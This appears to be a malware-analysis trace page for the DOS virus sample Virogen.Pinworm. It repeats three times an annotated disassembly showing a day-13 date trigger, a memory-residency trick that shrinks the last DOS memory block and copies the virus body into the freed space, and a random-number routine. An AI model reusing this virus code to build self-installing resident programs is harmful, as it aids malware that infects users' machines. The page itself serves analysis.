Sample viewer

vx.netlux.org/Virus.DOS.Virogen.Pinworm.2585


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:10:07.492762429Z 250 PC: 12f1b | UNKNOWN!
; Code reached right after the DOS "Get date" call (trace op 42 = INT 21h AH=2Ah,
; which returns the day of month in DL).
; Visible behaviour:
;   1. set a flag byte when the day of month is 13;
;   2. if the memory control block (MCB) at ES-1 is the last one in the chain,
;      shrink it by 0x180 paragraphs and copy the body from CS:BP into the
;      region that was carved off.
; The run metadata on this page varies "Day" (1 and 13), presumably to probe step 1.
; The listing stops at 0x12f59; nothing after the final push is shown.
; Analyst note: memory taken this way is not owned by any MCB, so the observable
; artefact is typically a last block that is 0x180 paragraphs smaller than expected.
2018-12-17T22:10:07.496126145Z 42 PC: 12f23 | Get date 0x12f23: cmp dl, 0xd ; DL == 13? (day-of-month check)
0x12f26: jne 0x12f2e ; any other day: leave the flag untouched
0x12f28: mov byte ptr cs:[bp + 0x80d], 1 ; flag byte at CS:[BP+0x80d] = 1; its consumer is not shown (BP looks like a base/delta offset — confirm)
0x12f2e: mov ax, es ; presumably ES = PSP segment at this point — confirm
0x12f30: dec ax ; one paragraph below ES: where DOS places the block's MCB if ES is the PSP
0x12f31: mov ds, ax ; DS = ES-1
0x12f33: cmp byte ptr [0], 0x5a ; MCB type byte: 'Z' (0x5A) marks the last block in the chain
0x12f38: jne 0x12f7f ; not the last block: skip the relocation (target is outside this listing)
0x12f3a: sub word ptr [3], 0x180 ; MCB size field (paragraphs) -= 0x180, i.e. 6144 bytes taken off the top
0x12f40: sub word ptr [0x12], 0x180 ; (ES-1):0x12 is ES:0x02 — the PSP top-of-memory segment if ES is the PSP
0x12f46: mov es, word ptr [0x12] ; ES = lowered top-of-memory = start of the carved-off region
0x12f4a: push cs
0x12f4b: pop ds ; DS = CS (source segment for the copy)
0x12f4c: mov si, bp ; SI = BP, start of the body in the current segment
0x12f4e: mov cx, 0x49b ; element count for the string copy
0x12f51: xor di, di ; destination offset 0
0x12f53: rep movsd dword ptr es:[di], dword ptr [si] ; copy CS:BP -> ES:0. NOTE(review): the instruction is 2 bytes long (next address is 0x12f55), which in 16-bit code matches rep movsw, so the length is probably 0x49b words (2358 bytes), not dwords — confirm against the raw bytes
0x12f55: xor ax, ax
0x12f57: mov ds, ax ; DS = 0, the segment holding the real-mode interrupt vector table; what is read or written there is not shown
0x12f59: push ds
; Code reached right after the DOS "Get time" call (trace op 44 = INT 21h AH=2Ch,
; which returns seconds in DH and hundredths in DL).
; Two routines are visible:
;   0x133b2-0x133b7  tail of a seeding routine: stores DX as the 16-bit seed at [0x813];
;   0x133b8-0x133d0  pseudo-random generator: seed = seed*0x7AB5 + 0x3619 (mod 2^16),
;                    then scales the seed by the caller's AX and returns the high word in DX.
; What the random values are used for is not visible in this trace.
2018-12-17T22:10:07.502026923Z 44 PC: 133b2 | Get time 0x133b2: mov word ptr [0x813], dx ; seed = DX (clock seconds:hundredths)
0x133b6: pop ax ; restore AX saved earlier in this routine (the push is outside the listing)
0x133b7: ret
0x133b8: push ax ; save caller's AX; it is popped into CX below and used as the range
0x133b9: mov ax, word ptr [0x813] ; load current seed
0x133bc: mov cx, 0x7ab5 ; multiplier
0x133bf: mul cx ; DX:AX = seed * 0x7AB5; only the low word is kept
0x133c1: add ax, 0x3619 ; increment
0x133c4: mov word ptr [0x813], ax ; store the updated seed
0x133c7: pop cx ; CX = caller's AX
0x133c8: mul cx ; DX:AX = seed * range; DX = high word, a value in 0..range-1
0x133ca: cmp dx, 0
0x133cd: jne 0x133d0 ; non-zero result is returned as is
0x133cf: inc dx ; a zero result is returned as 1
0x133d0: ret ; result in DX; AX and CX are clobbered
0x133d1: inc bx ; NOTE(review): from here to the end the one-byte opcodes are 43 48 4B 4C 49 = ASCII "CHKLI";
0x133d2: dec ax ; they follow a ret, so this is likely data (the start of a string) decoded as code
0x133d3: dec bx ; — confirm in a hex view before treating these as instructions
0x133d4: dec sp
0x133d5: dec cx

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2251,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:45:18.809582719Z 250 PC: 12f1b | UNKNOWN!
; Code reached right after the DOS "Get date" call (trace op 42 = INT 21h AH=2Ah,
; which returns the day of month in DL).
; Visible behaviour:
;   1. set a flag byte when the day of month is 13;
;   2. if the memory control block (MCB) at ES-1 is the last one in the chain,
;      shrink it by 0x180 paragraphs and copy the body from CS:BP into the
;      region that was carved off.
; The run metadata on this page varies "Day" (1 and 13), presumably to probe step 1.
; The listing stops at 0x12f59; nothing after the final push is shown.
2018-12-25T11:45:18.810769474Z 42 PC: 12f23 | Get date 0x12f23: cmp dl, 0xd ; DL == 13? (day-of-month check)
0x12f26: jne 0x12f2e ; any other day: leave the flag untouched
0x12f28: mov byte ptr cs:[bp + 0x80d], 1 ; flag byte at CS:[BP+0x80d] = 1; its consumer is not shown (BP looks like a base/delta offset — confirm)
0x12f2e: mov ax, es ; presumably ES = PSP segment at this point — confirm
0x12f30: dec ax ; one paragraph below ES: where DOS places the block's MCB if ES is the PSP
0x12f31: mov ds, ax ; DS = ES-1
0x12f33: cmp byte ptr [0], 0x5a ; MCB type byte: 'Z' (0x5A) marks the last block in the chain
0x12f38: jne 0x12f7f ; not the last block: skip the relocation (target is outside this listing)
0x12f3a: sub word ptr [3], 0x180 ; MCB size field (paragraphs) -= 0x180, i.e. 6144 bytes taken off the top
0x12f40: sub word ptr [0x12], 0x180 ; (ES-1):0x12 is ES:0x02 — the PSP top-of-memory segment if ES is the PSP
0x12f46: mov es, word ptr [0x12] ; ES = lowered top-of-memory = start of the carved-off region
0x12f4a: push cs
0x12f4b: pop ds ; DS = CS (source segment for the copy)
0x12f4c: mov si, bp ; SI = BP, start of the body in the current segment
0x12f4e: mov cx, 0x49b ; element count for the string copy
0x12f51: xor di, di ; destination offset 0
0x12f53: rep movsd dword ptr es:[di], dword ptr [si] ; copy CS:BP -> ES:0. NOTE(review): the instruction is 2 bytes long (next address is 0x12f55), which in 16-bit code matches rep movsw, so the length is probably 0x49b words (2358 bytes), not dwords — confirm against the raw bytes
0x12f55: xor ax, ax
0x12f57: mov ds, ax ; DS = 0, the segment holding the real-mode interrupt vector table; what is read or written there is not shown
0x12f59: push ds
; Code reached right after the DOS "Get time" call (trace op 44 = INT 21h AH=2Ch,
; which returns seconds in DH and hundredths in DL).
; Two routines are visible:
;   0x133b2-0x133b7  tail of a seeding routine: stores DX as the 16-bit seed at [0x813];
;   0x133b8-0x133d0  pseudo-random generator: seed = seed*0x7AB5 + 0x3619 (mod 2^16),
;                    then scales the seed by the caller's AX and returns the high word in DX.
; What the random values are used for is not visible in this trace.
2018-12-25T11:45:18.813488377Z 44 PC: 133b2 | Get time 0x133b2: mov word ptr [0x813], dx ; seed = DX (clock seconds:hundredths)
0x133b6: pop ax ; restore AX saved earlier in this routine (the push is outside the listing)
0x133b7: ret
0x133b8: push ax ; save caller's AX; it is popped into CX below and used as the range
0x133b9: mov ax, word ptr [0x813] ; load current seed
0x133bc: mov cx, 0x7ab5 ; multiplier
0x133bf: mul cx ; DX:AX = seed * 0x7AB5; only the low word is kept
0x133c1: add ax, 0x3619 ; increment
0x133c4: mov word ptr [0x813], ax ; store the updated seed
0x133c7: pop cx ; CX = caller's AX
0x133c8: mul cx ; DX:AX = seed * range; DX = high word, a value in 0..range-1
0x133ca: cmp dx, 0
0x133cd: jne 0x133d0 ; non-zero result is returned as is
0x133cf: inc dx ; a zero result is returned as 1
0x133d0: ret ; result in DX; AX and CX are clobbered
0x133d1: inc bx ; NOTE(review): from here to the end the one-byte opcodes are 43 48 4B 4C 49 = ASCII "CHKLI";
0x133d2: dec ax ; they follow a ret, so this is likely data (the start of a string) decoded as code
0x133d3: dec bx ; — confirm in a hex view before treating these as instructions
0x133d4: dec sp
0x133d5: dec cx

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2251,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:45:19.152646602Z 250 PC: 12f1b | UNKNOWN!
; Code reached right after the DOS "Get date" call (trace op 42 = INT 21h AH=2Ah,
; which returns the day of month in DL).
; Visible behaviour:
;   1. set a flag byte when the day of month is 13;
;   2. if the memory control block (MCB) at ES-1 is the last one in the chain,
;      shrink it by 0x180 paragraphs and copy the body from CS:BP into the
;      region that was carved off.
; The listing stops at 0x12f59; nothing after the final push is shown.
2018-12-25T11:45:19.153857082Z 42 PC: 12f23 | Get date 0x12f23: cmp dl, 0xd ; DL == 13? (day-of-month check)
0x12f26: jne 0x12f2e ; any other day: leave the flag untouched
0x12f28: mov byte ptr cs:[bp + 0x80d], 1 ; flag byte at CS:[BP+0x80d] = 1; its consumer is not shown (BP looks like a base/delta offset — confirm)
0x12f2e: mov ax, es ; presumably ES = PSP segment at this point — confirm
0x12f30: dec ax ; one paragraph below ES: where DOS places the block's MCB if ES is the PSP
0x12f31: mov ds, ax ; DS = ES-1
0x12f33: cmp byte ptr [0], 0x5a ; MCB type byte: 'Z' (0x5A) marks the last block in the chain
0x12f38: jne 0x12f7f ; not the last block: skip the relocation (target is outside this listing)
0x12f3a: sub word ptr [3], 0x180 ; MCB size field (paragraphs) -= 0x180, i.e. 6144 bytes taken off the top
0x12f40: sub word ptr [0x12], 0x180 ; (ES-1):0x12 is ES:0x02 — the PSP top-of-memory segment if ES is the PSP
0x12f46: mov es, word ptr [0x12] ; ES = lowered top-of-memory = start of the carved-off region
0x12f4a: push cs
0x12f4b: pop ds ; DS = CS (source segment for the copy)
0x12f4c: mov si, bp ; SI = BP, start of the body in the current segment
0x12f4e: mov cx, 0x49b ; element count for the string copy
0x12f51: xor di, di ; destination offset 0
0x12f53: rep movsd dword ptr es:[di], dword ptr [si] ; copy CS:BP -> ES:0. NOTE(review): the instruction is 2 bytes long (next address is 0x12f55), which in 16-bit code matches rep movsw, so the length is probably 0x49b words (2358 bytes), not dwords — confirm against the raw bytes
0x12f55: xor ax, ax
0x12f57: mov ds, ax ; DS = 0, the segment holding the real-mode interrupt vector table; what is read or written there is not shown
0x12f59: push ds
; Code reached right after the DOS "Get time" call (trace op 44 = INT 21h AH=2Ch,
; which returns seconds in DH and hundredths in DL).
; Two routines are visible:
;   0x133b2-0x133b7  tail of a seeding routine: stores DX as the 16-bit seed at [0x813];
;   0x133b8-0x133d0  pseudo-random generator: seed = seed*0x7AB5 + 0x3619 (mod 2^16),
;                    then scales the seed by the caller's AX and returns the high word in DX.
; What the random values are used for is not visible in this trace.
2018-12-25T11:45:19.156358723Z 44 PC: 133b2 | Get time 0x133b2: mov word ptr [0x813], dx ; seed = DX (clock seconds:hundredths)
0x133b6: pop ax ; restore AX saved earlier in this routine (the push is outside the listing)
0x133b7: ret
0x133b8: push ax ; save caller's AX; it is popped into CX below and used as the range
0x133b9: mov ax, word ptr [0x813] ; load current seed
0x133bc: mov cx, 0x7ab5 ; multiplier
0x133bf: mul cx ; DX:AX = seed * 0x7AB5; only the low word is kept
0x133c1: add ax, 0x3619 ; increment
0x133c4: mov word ptr [0x813], ax ; store the updated seed
0x133c7: pop cx ; CX = caller's AX
0x133c8: mul cx ; DX:AX = seed * range; DX = high word, a value in 0..range-1
0x133ca: cmp dx, 0
0x133cd: jne 0x133d0 ; non-zero result is returned as is
0x133cf: inc dx ; a zero result is returned as 1
0x133d0: ret ; result in DX; AX and CX are clobbered
0x133d1: inc bx ; NOTE(review): from here to the end the one-byte opcodes are 43 48 4B 4C 49 = ASCII "CHKLI";
0x133d2: dec ax ; they follow a ret, so this is likely data (the start of a string) decoded as code
0x133d3: dec bx ; — confirm in a hex view before treating these as instructions
0x133d4: dec sp
0x133d5: dec cx